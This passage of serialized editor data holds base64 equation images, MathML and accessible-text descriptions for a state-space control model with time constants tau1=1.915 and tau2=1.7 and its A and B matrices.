CwKAA3Iwd4stQO0gvwEAYEFAwQw4IAdzN4DaAQAALAgADsjlFzB3A6gdAAAAAGgXi/lAW1nMBwAW5X8B6o+p01ueVqcAAAQtdEVYdE1hdGhNTAA8bWF0aCB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMTk5OC9NYXRoL01hdGhNTCI+PG1zdHlsZSBtYXRoc2l6ZT0iMTZweCI+PG1vdmVyPjxtcm93PjxtaT54PC9taT48bWZlbmNlZD48bWk+dDwvbWk+PC9tZmVuY2VkPjwvbXJvdz48bW8+JiN4MkQ5OzwvbW8+PC9tb3Zlcj48bW8+PTwvbW8+PG1vPiYjeEEwOzwvbW8+PG1mZW5jZWQgY2xvc2U9Il0iIG9wZW49IlsiPjxtcm93Pjxtbz4tPC9tbz48bWZyYWM+PG1yb3c+PG1zdWI+PG1pPiYjeDNDNDs8L21pPjxtbj4xPC9tbj48L21zdWI+PG1vPiYjeEEwOzwvbW8+PG1vPis8L21vPjxtc3ViPjxtaT4mI3gzQzQ7PC9taT48bW4+MjwvbW4+PC9tc3ViPjwvbXJvdz48bXJvdz48bXN1Yj48bWk+JiN4M0M0OzwvbWk+PG1uPjE8L21uPjwvbXN1Yj48bW8+LjwvbW8+PG1vPiYjeEEwOzwvbW8+PG1zdWI+PG1pPiYjeDNDNDs8L21pPjxtbj4yPC9tbj48L21zdWI+PC9tcm93PjwvbWZyYWM+PC9tcm93PjwvbWZlbmNlZD48bWk+eDwvbWk+PG1mZW5jZWQ+PG1pPnQ8L21pPjwvbWZlbmNlZD48bW8+JiN4QTA7PC9tbz48bW8+KzwvbW8+PG1mZW5jZWQgY2xvc2U9Il0iIG9wZW49IlsiPjxtdGFibGU+PG10cj48bXRkPjxtZnJhYz48bXN1Yj48bWk+QTwvbWk+PG1uPjAxPC9tbj48L21zdWI+PG1zdWI+PG1pPiYjeDNDNDs8L21pPjxtbj4xPC9tbj48L21zdWI+PC9tZnJhYz48L210ZD48bXRkPjxtZnJhYz48bXN1Yj48bWk+QTwvbWk+PG1uPjAyPC9tbj48L21zdWI+PG1zdWI+PG1pPiYjeDNDNDs8L21pPjxtbj4yPC9tbj48L21zdWI+PC9tZnJhYz48L210ZD48L210cj48L210YWJsZT48L21mZW5jZWQ+PG1pPnU8L21pPjxtZmVuY2VkPjxtaT50PC9taT48L21mZW5jZWQ+PG1vPiw8L21vPjxtbz4mI3hBMDs8L21vPjxtbz4mI3hBMDs8L21vPjxtbz4mI3hBMDs8L21vPjxtbz4mI3hBMDs8L21vPjxtaT55PC9taT48bWZlbmNlZD48bWk+dDwvbWk+PC9tZmVuY2VkPjxtbz4mI3hBMDs8L21vPjxtbz49PC9tbz48bW8+JiN4MjAwOTs8L21vPjxtaT54PC9taT48bWZlbmNlZD48bWk+dDwvbWk+PC9tZmVuY2VkPjwvbXN0eWxlPjwvbWF0aD5ZSgNHAAAAAElFTkSuQmCC\&quot;,\&quot;slideId\&quot;:308,\&quot;accessibleText\&quot;:\&quot;stack x open parentheses t close parentheses with dot on top equals space open square brackets negative fraction numerator tau subscript 1 space plus tau subscript 2 over denominator tau subscript 1. space tau subscript 2 end fraction close square brackets x open parentheses t close parentheses space plus open square brackets table row cell A subscript 01 over tau subscript 1 end cell cell A subscript 02 over tau subscript 2 end cell end table close square brackets u open parentheses t close parentheses comma space space space space y open parentheses t close parentheses space equals thin space x open parentheses t close parentheses\&quot;,\&quot;imageHeight\&quot;:30.586956521739133},{\&quot;mathml\&quot;:\&quot;&lt;math style=\\\&quot;font-family:stix;font-size:16px;\\\&quot; xmlns=\\\&quot;http://www.w3.org/1998/Math/MathML\\\&quot;&gt;&lt;mstyle mathsize=\\\&quot;16px\\\&quot;&gt;&lt;msub&gt;&lt;mi&gt;&amp;#x3C4;&lt;/mi&gt;&lt;mn&gt;1&lt;/mn&gt;&lt;/msub&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mo&gt;=&lt;/mo&gt;&lt;mo&gt;&amp;#x2009;&lt;/mo&gt;&lt;mn&gt;1&lt;/mn&gt;&lt;mo&gt;.&lt;/mo&gt;&lt;mn&gt;915&lt;/mn&gt;&lt;mo&gt;,&lt;/mo&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;msub&gt;&lt;mi&gt;&amp;#x3C4;&lt;/mi&gt;&lt;mn&gt;2&lt;/mn&gt;&lt;/msub&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mo&gt;=&lt;/mo&gt;&lt;mo&gt;&amp;#x2009;&lt;/mo&gt;&lt;mn&gt;1&lt;/mn&gt;&lt;mo&gt;.&lt;/mo&gt;&lt;mn&gt;7&lt;/mn&gt;&lt;mo&gt;,&lt;/mo&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;msub&gt;&lt;mi&gt;A&lt;/mi&gt;&lt;mn&gt;01&lt;/mn&gt;&lt;/msub&gt;&lt;mo&gt;=&lt;/mo&gt;&lt;mo&gt;&amp;#x2009;&lt;/mo&gt;&lt;mn&gt;24&lt;/mn&gt;&lt;mo&gt;.&lt;/mo&gt;&lt;mn&gt;88&lt;/mn&gt;&lt;mo&gt;,&lt;/mo&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;msub&gt;&lt;mi&gt;A&lt;/mi&gt;&lt;mn&gt;02&lt;/mn&gt;&lt;/msub&gt;&lt;mo&gt;=&lt;/mo&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mn&gt;19&lt;/mn&gt;&lt;mo&gt;.&lt;/mo&gt;&lt;mo&gt;&amp;#x2009;&lt;/mo&gt;&lt;mn&gt;51&lt;/mn&gt;&lt;/mstyle&gt;&lt;/math&gt;\&quot;,\&quot;base64Image\&quot;:\&quot;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pgcAIAAGAIDiGAm14m9MAQCQmh7Vml4ejbmPd1nHNEMdWXwx8T8AAFpATA8AjYIAGAAA0rIt1InzmAIAoGseaDH3lS6PX2SI29cT/wMAoAXE9AAABMAAAJAf2RTnZ1BuYAoAgEwc1WLuV10ev1U7/rvKtukZ8T8AQHO1gJgeABoJATAAAHRipWptriMjVvoyHD8UlF7MCAANZ6Eh7p7ZxfFntGMvEP8DAKAFxPQAAATAAACQD5lm+Skoz4LSn/H4t5gRAOA/Hmpx93AXx77Sjl1F/A8AgBYQ0wMAdGYmATAAAMQwGJT3QXkTlNkZNeaFak31BACAqVPXR1Met0w77inxPwAAWkBMDwCQjhUEwAAAYGBAtUaYfAzK/C6PlamRG8NAWXRlHuYEAPjN00jcPR6UOSmOOavF6+uI/wEA0AJiegCAdOw1BMA7MQsAQKOR6fGPDfqQpdzDnAAAk1iiWpuWpV2/Vaadj6v8a38T/wMANEsLiOkBAFTr698Hg2OTr4MDmAcAoJH0BOV2QYGylB2YFABgCpuC8lN1TkDPCspLNTkB0ZfjvMT/AADN0AJiegBoNLuCcjoo1zVHqxf5Enk1KP8EZXdQpmE6AIBGMFpgoCy7zLNTPACAmTWqNSW97TNPBWVu+DeJvbcEZSzy98sqW/Kb+B8AoHlaQEwPAI3mR0aHh7MDAKg/hwsMlKWcwaQAAInIqL6TYXKh7TslXo9Oc3+k8q3RTfwPANAsLSCmBwAAAAAAAACnkFF+MgpQppjL6GsZtb1ZpdsUDQAA0AIAAKv8Hy92bG8zlnBxAAACkHRFWHRNYXRoTUwAPG1hdGggeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzE5OTgvTWF0aC9NYXRoTUwiPjxtc3R5bGUgbWF0aHNpemU9IjE2cHgiPjxtc3ViPjxtaT4mI3gzQzQ7PC9taT48bW4+MTwvbW4+PC9tc3ViPjxtbz4mI3hBMDs8L21vPjxtbz49PC9tbz48bW8+JiN4MjAwOTs8L21vPjxtbj4xPC9tbj48bW8+LjwvbW8+PG1uPjkxNTwvbW4+PG1vPiw8L21vPjxtbz4mI3hBMDs8L21vPjxtbz4mI3hBMDs8L21vPjxtbz4mI3hBMDs8L21vPjxtc3ViPjxtaT4mI3gzQzQ7PC9taT48bW4+MjwvbW4+PC9tc3ViPjxtbz4mI3hBMDs8L21vPjxtbz49PC9tbz48bW8+JiN4MjAwOTs8L21vPjxtbj4xPC9tbj48bW8+LjwvbW8+PG1uPjc8L21uPjxtbz4sPC9tbz48bW8+JiN4QTA7PC9tbz48bW8+JiN4QTA7PC9tbz48bW8+JiN4QTA7PC9tbz48bXN1Yj48bWk+QTwvbWk+PG1uPjAxPC9tbj48L21zdWI+PG1vPj08L21vPjxtbz4mI3gyMDA5OzwvbW8+PG1uPjI0PC9tbj48bW8+LjwvbW8+PG1uPjg4PC9tbj48bW8+LDwvbW8+PG1vPiYjeEEwOzwvbW8+PG1zdWI+PG1pPkE8L21pPjxtbj4wMjwvbW4+PC9tc3ViPjxtbz49PC9tbz48bW8+JiN4QTA7PC9tbz48bW4+MTk8L21uPjxtbz4uPC9tbz48bW8+JiN4MjAwOTs8L21vPjxtbj41MTwvbW4+PC9tc3R5bGU+PC9tYXRoPh249C0AAAAASUVORK5CYII=\&quot;,\&quot;slideId\&quot;:300,\&quot;accessibleText\&quot;:\&quot;tau subscript 1 space equals thin space 1.915 comma space space space tau subscript 2 space equals thin space 1.7 comma space space space A subscript 01 equals thin space 24.88 comma space A subscript 02 equals space 19. thin space 51\&quot;,\&quot;imageHeight\&quot;:10.413820180604633},{\&quot;mathml\&quot;:\&quot;&lt;math style=\\\&quot;font-family:stix;font-size:16px;\\\&quot; xmlns=\\\&quot;http://www.w3.org/1998/Math/MathML\\\&quot;&gt;&lt;mstyle mathsize=\\\&quot;16px\\\&quot;&gt;&lt;mi&gt;A&lt;/mi&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mo&gt;=&lt;/mo&gt;&lt;mo&gt;&amp;#x2009;&lt;/mo&gt;&lt;mfenced open=\\\&quot;[\\\&quot; close=\\\&quot;]\\\&quot;&gt;&lt;mrow&gt;&lt;mo&gt;-&lt;/mo&gt;&lt;mn&gt;0&lt;/mn&gt;&lt;mo&gt;.&lt;/mo&gt;&lt;mn&gt;5552&lt;/mn&gt;&lt;/mrow&gt;&lt;/mfenced&gt;&lt;mo&gt;,&lt;/mo&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mi&gt;B&lt;/mi&gt;&lt;mo&gt;=&lt;/mo&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mfenced open=\\\&quot;[\\\&quot; close=\\\&quot;]\\\&quot;&gt;&lt;mtable&gt;&lt;mtr&gt;&lt;mtd&gt;&lt;mn&gt;12&lt;/mn&gt;&lt;mo&gt;.&lt;/mo&gt;&lt;mn&gt;987&lt;/mn&gt;&lt;/mtd&gt;&lt;mtd&gt;&lt;mn&gt;11&lt;/mn&gt;&lt;mo&gt;.&lt;/mo&gt;&lt;mn&gt;4765&lt;/mn&gt;&lt;/mtd&gt;&lt;/mtr&gt;&lt;/mtable&gt;&lt;/mfenced&gt;&lt;/mstyle&gt;&lt;/math&gt;\&quot;,\&quot;base64Image\&quot;:\&quot;iVBORw0KGgoAAAANSUhEUgAABdoAAACMCAYAAABrnRtzAAAACXBIWXMAAA7EAAAOxAGVKw4bAAAABGJhU0UAAABfO/De+wAALUhJREFUeNrt3Q/EFdn/wPGPJEkiSZJEkiSJZCUrkeSRJJJkrUSykpXISpLEylpZiSRJEitJkkiSJEuykqxIspJEkuSR+P3uZ595vs29zcyZuXPOzDln3i